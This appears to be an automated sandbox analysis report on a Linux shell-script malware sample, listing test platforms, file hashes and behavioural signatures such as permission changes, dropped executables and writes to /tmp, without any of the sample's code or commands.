Analysis
max time kernel: 20s
max time network: 129s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 21/10/2024, 02:00
Static task: static1
Behavioral task: behavioral1
Sample: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
Sample: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
Sample: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
Sample: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource: debian9-mipsel-20240611-en
General
Target: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Size: 10KB
MD5: f542050a645c72e971d62a3493d03ae4
SHA1: 9517efa75044c18478c68a6d42b01b42a2af2329
SHA256: 90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c
SHA512: 2934d0671bff24eb6ed85dc500e0d6b40470feb320ea6561cda2cb0e9aca88122ba2739e65472e29c40a565454c1182288cf4f4feb19d9143e1ecd3daab76a26
SSDEEP: 96:VVRM3rrZCbd1HK0VBiVtx2VNzk4atFzbUeVRM3rrlXkbd1/f3s1O5VBiVtn:0Cbd1q0VBiVtx2VNGjd1jVBiVtn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97